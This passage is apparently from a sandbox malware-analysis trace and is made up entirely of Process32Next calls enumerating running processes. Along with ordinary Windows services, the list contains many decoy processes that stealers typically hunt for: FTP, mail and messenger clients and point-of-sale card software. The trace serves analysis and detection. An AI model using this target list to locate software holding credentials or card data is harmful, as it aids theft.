pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.583] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.585] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.587] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.630] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.633] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.635] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.637] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.638] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.643] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.645] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.646] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.648] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.650] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.651] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.653] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0218.655] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.657] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0218.659] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.661] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0218.663] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0218.665] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0218.667] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0218.751] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.753] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0218.755] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.756] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.758] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0218.760] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.762] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.764] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.766] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.767] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0218.769] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0218.771] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0218.773] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0218.774] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0218.776] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0218.779] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0218.781] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0218.783] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0218.784] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0218.820] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0218.822] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0218.824] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0218.826] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0218.828] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0218.829] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0218.831] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0218.833] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0218.835] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0218.836] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0218.838] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0218.840] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0218.842] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0218.845] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0218.847] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0218.849] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0218.851] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0218.862] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0218.866] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0218.869] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0218.872] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0218.875] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0218.877] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0218.880] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0218.883] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0218.886] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0218.888] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0218.891] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0218.894] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0218.896] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0218.903] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0218.906] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0218.910] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0218.913] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0218.915] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0218.918] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0218.921] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0218.923] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0218.926] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0218.929] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0218.934] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0218.937] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0218.944] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0218.947] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0218.950] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: 